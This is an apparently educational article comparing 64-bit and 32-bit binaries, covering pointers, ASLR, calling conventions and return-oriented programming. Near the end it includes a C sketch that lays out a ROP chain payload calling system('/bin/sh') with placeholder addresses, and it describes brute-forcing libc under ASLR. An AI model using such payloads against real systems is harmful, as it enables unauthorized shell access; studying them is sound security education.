64-bit vs 32-bit

Key Differences and Exploitation Techniques

Introduction


Up to this point, we have covered exploiting binary vulnerabilities in 32-bit programs. However, with the prevalence of 64-bit computing systems today, this article will introduce x64 binary exploitation.


Concepts


First, we'll go over the main concepts of 64-bit architecture and how it differs from 32-bit.


64-bit vs 32-bit


What is 64-Bit Architecture?


In computer systems, "64-bit" refers to the width of the processor's registers and the amount of data it can handle at once. A 64-bit processor can process 64 bits of data in one go, compared to a 32-bit processor, which handles 32 bits at a time. This means a 64-bit system can work with larger chunks of data and access more memory.


One of the biggest advantages of 64-bit architecture is its ability to address more memory. A 32-bit system can only use up to 4 gigabytes (GB) of RAM, while a 64-bit system can theoretically access up to 18 exabytes of RAM. In practical terms, this means a 64-bit system can use much more memory, which is especially useful for running large applications or multiple programs simultaneously.


Registers & Pointers


As I've already explained in my article on Introduction to Binary Exploitation, registers are small storage locations within the CPU that hold data temporarily while the processor is working. In a 64-bit processor, these registers are 64 bits wide, allowing them to hold larger values compared to 32-bit registers. This results in more efficient processing and better performance for tasks that require handling large numbers or complex data.


Pointers are variables that store the memory addresses of other variables. In a 32-bit system, pointers are 32 bits long (4 bytes), which means they can address up to 4 GB of memory. In a 64-bit system, pointers are 64 bits long (8 bytes), allowing them to address a much larger range of memory—up to 18 exabytes in theory. This greatly expands the amount of memory a program can use.


Let’s create a simple program to demonstrate the difference between the size of pointers in 64-bit and 32-bit programs.


#include <stdio.h>

int main(){

    int x = 5;        // an integer variable
    int *pX = &x;     // a pointer holding the address of x

    printf("pX pointer points to: %p\n", (void *)pX);   // the address stored in pX
    printf("Value pointed to by pX: %d\n", *pX);        // the value at that address

    return 0;
}

This program performs two main tasks in sequence. First, it declares an integer variable named x and assigns it the value 5. Next, it declares an integer pointer named pX, which is initialized to point to the memory address of the variable x. This means that pX now contains the address where x is stored.


The program then uses two printf() calls to display information about the pointer and the variable it points to. The first printf() prints the memory address that pX points to, showing where in memory the variable x is located. The second printf() prints the value stored at that address, which in this case is the value of x: 5.


Now, compile it with the -m32 parameter to instruct the compiler to create a 32-bit binary:


elswix@ubuntu$ gcc program.c -o program -m32

Let's execute it:


elswix@ubuntu$ ./program
pX pointer points to: 0xffec94b4
Value pointed to by pX: 5

As observed, the program printed the memory address of the variable x. Since we compiled it with the -m32 parameter, the memory address is 32 bits long (4 bytes).


Now, compile it without the -m32 parameter. On a 64-bit system, the compiler produces a 64-bit binary by default if no other options are specified.


elswix@ubuntu$ gcc program.c -o program

Now, let's execute it:


elswix@ubuntu$ ./program
pX pointer points to: 0x7ffe44198b9c
Value pointed to by pX: 5

As observed, the pX pointer holds a significantly larger address in the 64-bit version. The same applies to registers: in 64-bit systems, registers can hold 8-byte values. The following image shows a GDB output using the context tool from GEF, illustrating the differences between 32-bit and 64-bit programs:




With larger registers and pointers, 64-bit systems can handle more data at once and access more memory, which changes both how software is written and how vulnerabilities are exploited. For example, buffer overflows and other attacks that involve manipulating pointers become trickier because the addresses are wider and much harder to guess.
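

If you'd rather confirm the pointer width directly in code instead of judging by the length of the printed address, sizeof reports it. Here's a minimal sketch; compile it with and without -m32, just like the previous program:


#include <stdio.h>

int main(){

    // sizeof reports the pointer width of the current build:
    // 4 bytes for a 32-bit binary, 8 bytes for a 64-bit binary.
    printf("sizeof(int *)  = %zu bytes\n", sizeof(int *));
    printf("sizeof(void *) = %zu bytes\n", sizeof(void *));

    return 0;
}

The 32-bit build should report 4 bytes for each pointer, and the 64-bit build 8 bytes.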


Segmentation


Segmentation refers to how memory is divided and managed by the CPU and operating system. On x86-64, classic hardware segmentation is largely disabled in 64-bit mode (segment bases and limits are mostly ignored, apart from FS and GS), but a process's memory is still organized into distinct regions, such as the code, data, and stack segments. This organization helps manage memory efficiently and prevents different types of data from interfering with each other.
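

To get a feel for these regions from inside a process, here's a minimal sketch that prints one address from each of them. The function-pointer cast to void * is a common GCC/POSIX extension, and the exact addresses will vary between runs:


#include <stdio.h>

int global_var = 42;            // lives in the data segment

int main(){

    int local_var = 5;          // lives on the stack

    printf("code  (main)       : %p\n", (void *)&main);
    printf("data  (global_var) : %p\n", (void *)&global_var);
    printf("stack (local_var)  : %p\n", (void *)&local_var);

    return 0;
}

Running it prints three clearly separated address ranges, one per region.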


Security


In 64-bit systems, memory protection features are more robust compared to 32-bit systems due to the larger address space and more advanced CPU features.


ASLR: The larger memory address range in 64-bit systems allows for more effective implementation of ASLR, making it even harder for attackers to guess memory locations.


I discussed this in my first article on the ret2libc technique. When demonstrating how to exploit a buffer overflow using this technique, I covered the Brute Force method. This method involves picking a candidate libc base address and executing the binary repeatedly until the real libc base matches the chosen one, allowing us to call arbitrary libc functions with valid memory addresses. In 32-bit systems, the randomized portion of the address space is relatively small, so there are few possible base addresses and repeated executions will eventually hit the right one. In 64-bit systems, however, there are far more randomized bits, making it practically impossible to achieve the same result by brute forcing a fixed libc base.
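

A quick way to see this in practice is to print an address from the stack and one from inside libc, then run the binary a few times: with ASLR enabled, both change on every execution, and the 64-bit build has far more random bits to guess. Here's a minimal sketch (on glibc, the stdin pointer points into libc's data):


#include <stdio.h>

int main(){

    int local_var = 0;

    // Both addresses are randomized by ASLR, so they change on every run.
    printf("stack address     : %p\n", (void *)&local_var);
    printf("libc data (stdin) : %p\n", (void *)stdin);

    return 0;
}

Compare a few runs of the 32-bit and 64-bit builds: the 32-bit addresses only carry a handful of randomized bits, which is exactly why the brute-force approach was feasible there.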


Enhanced Security: 64-bit CPUs often include additional security features like SMEP (Supervisor Mode Execution Prevention), which prevents the CPU, while running in supervisor mode (i.e., kernel code), from executing instructions located in user-mode memory pages.


Calling Conventions


Calling conventions are a set of rules that define how functions receive parameters from the caller and how they return results. These rules include details on where parameters are stored (in registers or on the stack), how the stack is managed, and who is responsible for cleaning up the stack after a function call. Calling conventions ensure that functions communicate consistently, which is essential for correct program execution.


In 64-bit systems, calling conventions are different from those in 32-bit systems due to the changes in register sizes and the larger address space. For example:


Registers for Parameters: In 64-bit systems, more parameters can be passed in registers rather than on the stack. This can speed up function calls and improve performance. For instance, the x86-64 architecture uses specific registers (like rdi, rsi, rdx, etc.) to pass the first few arguments to functions, while additional arguments are passed on the stack.


Stack Management: The rules for stack alignment are stricter in 64-bit systems; the x86-64 ABIs require the stack to be 16-byte aligned at function call boundaries, largely so that SSE instructions operating on 16-byte data work correctly. Proper alignment helps maintain performance and stability.


In 32-bit systems, function parameters are typically passed on the stack. With the default cdecl convention, every argument is pushed onto the stack before the call; only special conventions like fastcall use registers for some of them. This can make function calls slower due to the extra stack operations.


Let’s compare how functions are called in 32-bit versus 64-bit systems using the following program:


#include <stdio.h>

int sum(int a, int b, int c, int d, int e, int f, int g, int h, int i){
    return a + b + c + d + e + f + g + h + i;
}

int main(){

    int result;
    result = sum(1, 3, 3, 10, 50, 250, 20, 500, 500);
    printf("[+] RESULT: %d", result);

    return 0; 
}

Let's compile a version for 32-bit and another for 64-bit:


elswix@ubuntu$ gcc program.c -o program64
elswix@ubuntu$ gcc program.c -o program32 -m32

Both versions should print the same value:


elswix@ubuntu$ ./program32
[+] RESULT: 1337                                                            
elswix@ubuntu$ ./program64
[+] RESULT: 1337
elswix@ubuntu$

Let’s use GDB to thoroughly analyze what’s happening behind the scenes:


elswix@ubuntu$ gdb -q ./program32
GEF for linux ready, type `gef' to start, `gef config' to configure
88 commands loaded and 5 functions added for GDB 12.1 in 0.00ms using Python engine 3.10
Reading symbols from program32...
(No debugging symbols found in program32)
gef$

If we disassemble the main function in the 32-bit version, we will observe the following code:



As observed, when calling the sum() function, each parameter value is pushed onto the stack before the function is invoked.


Let's see what happens in the 64-bit version:



As observed, the main function is notably smaller in the 64-bit version. Additionally, we can see that the first six parameter values for the sum function are passed through the registers rdi, rsi, rdx, rcx, r8, and r9 (in that order), while the remaining three arguments are placed on the stack before the call.


Keep this in mind, as it is important for exploiting 64-bit programs.


Examples of Calling Conventions in 64-bit


Different operating systems and compilers may use different calling conventions. For instance:


System V AMD64 ABI (used on Linux): This convention specifies that the first six integer or pointer arguments are passed in specific registers (rdi, rsi, rdx, rcx, r8, r9), while additional arguments are passed on the stack. Return values are typically passed in the rax register.


Microsoft x64 Calling Convention (used on Windows): This convention also uses registers to pass the first four arguments (rcx, rdx, r8, r9) and the stack for additional arguments. Return values are passed in rax, and there are specific rules for stack alignment.


Return-Oriented Programming (ROP)


Return-Oriented Programming (ROP) is a sophisticated exploitation technique used to execute arbitrary code despite the presence of security mechanisms like Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). ROP circumvents these defenses by reusing small sequences of instructions, known as "gadgets," that already exist within the program or its libraries. These gadgets typically end in a ret instruction, allowing the attacker to chain them together to perform malicious actions and achieve their objectives.


How Does ROP Work?


Finding Gadgets: Gadgets are small pieces of code ending in a ret instruction. Each gadget performs a specific action, such as adding numbers or moving data. These gadgets are found within the executable code of a program or its libraries.


Chaining Gadgets: An attacker crafts a sequence of gadgets that, when executed in order, performs the desired malicious operations. This sequence is controlled by manipulating the stack to set up the appropriate return addresses.


Bypassing Protections: By using gadgets and manipulating the return address stack, ROP can bypass memory protection mechanisms like DEP, which prevents execution of code in non-executable regions. ROP does not inject new code but reuses existing code, making it effective against such defenses.


If you've read my article on Introduction to Binary Exploitation, you might already understand why these gadgets must always end with a ret instruction (which is why it's called Return-Oriented Programming). However, if you don't fully grasp why the ret is always required, let's discuss it further.


The ret instruction is what ends practically every function in a binary. It is essentially the counterpart of the call instruction.


Imagine you call a function in your program; in assembly, it looks something like this:


call myFunction

The call instruction performs two main actions. First, it pushes the address of the instruction following the call onto the stack; this is known as the return address for the called function. Then, it updates the Instruction Pointer to the beginning of the called function, thus altering the program's execution flow to redirect it to the new function.


When it's time to return to the previous function (the one that called the current function), the ret instruction plays a crucial role. As noted earlier, the call instruction pushes the return address onto the stack. When the ret instruction is executed, it pops this return address off the stack and loads it into the Instruction Pointer, thereby resuming execution at the point where the call was made.
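

To make this concrete, here's a minimal C sketch with comments describing what call and ret do at the machine level when the program is compiled without optimizations:


#include <stdio.h>

void myFunction(){
    puts("inside myFunction");
    // The compiler ends this function with a ret instruction: it pops the
    // saved return address off the stack into the Instruction Pointer,
    // resuming execution right after the call in main().
}

int main(){

    // This compiles to a "call myFunction" instruction: the address of the
    // instruction immediately following it is pushed onto the stack as the
    // return address, and execution jumps to myFunction.
    myFunction();
    puts("back in main");

    return 0;
}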


But why is this important for exploitation, and why must instructions in Return-Oriented Programming (ROP) always end with a ret?


For instance, consider exploiting a stack-based buffer overflow. When you overflow the buffer on the stack, you eventually reach the return address. If you overwrite this address with the address of another function, the program will return to that function when the current function completes. In this scenario, you don’t need an additional ret instruction after the function call.


However, if you need to call a function that requires parameters, the situation changes. In 64-bit programs, parameters are typically passed through registers (at least the first six), so you need to place the parameter values in these registers. In 32-bit programs, parameters were often passed via the stack, but now, with 64-bit, you need to manipulate registers directly.


To achieve this, you can use pop instructions. For example, suppose you want to call the system() function, which expects a single parameter in the rdi register. You need to execute a pop rdi instruction to load this parameter into rdi. This requires placing the parameter value on the stack in such a way that when pop rdi is executed, it retrieves the correct value from the stack and loads it into rdi. After executing the pop rdi instruction, you must ensure that the next instruction to execute is a ret. This will load the address of system() (which you placed on the stack, following the value you want to load into rdi) into the Instruction Pointer. Without this ret, the system() function will not be called.
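

To tie it all together, here is a minimal sketch of how such a chain is laid out in memory. Every concrete value in it (the padding size, the gadget address, and the "/bin/sh" and system() addresses) is a made-up placeholder for illustration; in a real exploit you would recover them from the target binary and its libc:


#include <stdio.h>
#include <string.h>

// Hypothetical placeholder values, for illustration only.
#define PADDING      72                     // bytes from the buffer to the saved return address (assumed)
#define POP_RDI_RET  0x00000000004011fbUL   // address of a "pop rdi; ret" gadget (assumed)
#define BINSH_ADDR   0x00007ffff7f5a698UL   // address of the "/bin/sh" string in libc (assumed)
#define SYSTEM_ADDR  0x00007ffff7dc2740UL   // address of system() in libc (assumed)

int main(){

    unsigned char payload[PADDING + 3 * sizeof(unsigned long)];
    unsigned long chain[3] = {
        POP_RDI_RET,   // overwrites the saved return address: the overflowed function's ret jumps here
        BINSH_ADDR,    // popped into rdi by the gadget (the single argument for system)
        SYSTEM_ADDR    // the gadget's trailing ret jumps here: system("/bin/sh")
    };

    memset(payload, 'A', PADDING);                     // filler up to the saved return address
    memcpy(payload + PADDING, chain, sizeof(chain));   // the ROP chain, written little-endian

    fwrite(payload, 1, sizeof(payload), stdout);       // feed this to the vulnerable program
    return 0;
}

The ordering on the stack is what matters: the gadget address sits where the saved return address used to be, the value destined for rdi comes right after it, and the address of system() comes last so that the gadget's trailing ret lands on it.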


Thus, the ret instruction is essential because it ensures the correct function is called after setting up the necessary parameters.


Conclusion


In summary, there are notable differences between 32-bit and 64-bit programs. While exploiting 64-bit programs is more complex, it is manageable with the right approach.


Keep these concepts in mind, as the next article will be the second part of our exploration of ret2libc. It will focus on using Return-Oriented Programming (ROP) to exploit a 64-bit buffer overflow.


References


I learned these concepts from:


https://en.wikipedia.org/wiki/Calling_convention
https://en.wikipedia.org/wiki/X86_calling_conventions
https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention
https://learn.microsoft.com/en-us/cpp/cpp/calling-conventions
https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/calling-conventions
https://book.hacktricks.xyz/binary-exploitation/rop-return-oriented-programing
https://en.wikipedia.org/wiki/Return-oriented_programming
https://ctf101.org/binary-exploitation/return-oriented-programming/
https://www.youtube.com/watch?v=vXWHmucgZW0&pp=ygUVbGl2ZW92ZXJmbG93IDMyIHZzIDY0